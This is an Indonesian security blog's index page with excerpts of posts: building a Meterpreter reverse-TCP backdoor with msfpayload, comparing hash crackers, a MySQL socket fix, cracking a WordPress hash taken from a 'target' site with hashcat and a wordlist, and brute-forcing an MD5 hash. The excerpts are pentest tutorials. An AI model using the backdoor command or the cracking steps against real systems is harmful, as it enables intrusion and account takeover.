Selasa, 10 Juni 2014

Standard exploit seperti potongan judul diatas, yang bisa diartikan "exploit biasa" dalam metasploit ( contoh dasar dalam menjalankan exploitasi pada sistem target ) karena didalam peng-exploitan ini saya tidak melibatkan encoder , penghindaran karakter, dll. Hanya exploit yang dijalankan oleh metasploit sendiri.

Oke tanpa basa-basi lagi, mari membuat backdoor dengan bantuan msfpayload 

root@dani:[~]# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.13.115 LPORT=4444 X > /root/Desktop/backdoor.exe

Posted on 04.45 by kakanDani

No comments

Halo pembaca Kill -9 Security =)

Kali ini saya akan menguji kelebihan dari dua tool offline password attack dengan menggunakan enkripsi sha-256 . Dari beberapa blog mungkin kamu pernah melihat yang di uji adalah enkripsi MD5 dan hasil yang diberikan hampir semua seimbang.
Untuk mengetahui kelebihan secara lebih , saya akan mencobanya 

Hashcat (ada di Back|Track & Kali Linux )
John The Ripper (ada di Back|Track & Kali Linux )

Dengan masing-masing tool menggunakan versi yang terbaru.
Versi untuk Hashcat

Posted on 00.59 by kakanDani

No comments

Kamis, 15 Mei 2014

Mungkin kamu pernah mengalami pernyataan error seperti ini


Salah satu penyebabnya adalah tidak adanya file pada /path/mysql.sock.
Untuk proses fix nya , jalankan perintah 

 ┌─[ dani ]─( ~/Desktop )
 └─>
ln -s /opt/lampp/var/mysql/mysql.sock /var/run/mysqld/mysqld.sock


Jalankan kembali mysql kamu =)

by Altiiever

Posted on 02.10 by kakanDani

No comments

Ada beberapa kendala saat kalian mencoba masuk ke website target , salah satunya bertemu dengan hash yang memuat symbolic yang seperti ini

$P$B0.04RLbydgW.GCmIBjU.HnwBe/kFj1

Oke, untuk memecahkannya, saya akan membutuhkan 2 tool berikut
  1. Hash-identifier ( ada di Back|track & Kali Linux )
  2. Hashcat ( ada di Back|track & Kali Linux )
Kita test, jenis apakah hash tersebut. Kebetulan OS yang saya gunakan adalah Kali Linux.

   Applications  > Kali Linux > Password Attacks > Offline Attacks > hash-identifier



Ya, sudah jelas bahwa hash diatas adalah jenis hash wordpress, jalankan hashcat.

  Applications  > Kali Linux > Password Attacks > Offline Attacks > hashcat

Saya menggunakan perintah 

hashcat -m [ tipe hash ] -a [ mode pemecahan ] hashfile [ wordlist ]
 
┌─[ dani ]─( ~/Desktop )
└─> hashcat -m 400 -a 0 hash.txt /root/wordlist/rockyou.txt 

Note : -m 400 karena jenis hash wordpress di hashcat terletak pada options ke 400 dan -a 0 karena saya menggunakan cara straight.



Hash dari  $P$B0.04RLbydgW.GCmIBjU.HnwBe/kFj1 adalah theoriginalbadsmoker .

Password Cracked !

by Altiiever

Posted on 01.45 by kakanDani

No comments

Jumat, 09 Mei 2014

Banyak yang kamu lakukan untuk memecahkan password yang masih di encrypt , salah satunya MD5.
Biasanya yang di lakukan pergi ke web MD5 decrypter, Bruteforce, menggunakan John The Ripper dan Hashcat. Cara diatas semua itu menggunakan jutaan wordlist yang disimpan, alhasil jika wordlist tidak ada yang cocok dengan encrypt-an tadi maka password tidak akan terpecahkan.
Mungkin masih ada cara lain lagi yang saya ketahui disini dengan metode Bruteforce (without wordlist).

Contoh MD5 yang akan saya decrypt

  55b7e8b895d047537e672250dd781555

Pertama sediakan file .txt , untuk tempat hash yang akan kita decrypt. Contoh hash.txt

Jalankan script untuk decrypt, lalu pilih angka 2 untuk crack hash.



Brute dari huruf a sampai ketemu dengan hash yang kita decrypt,
lama tidaknya tergantung dari hash yang kita pecahkan.


 

by Altiiever

Posted on 22.43 by kakanDani

No comments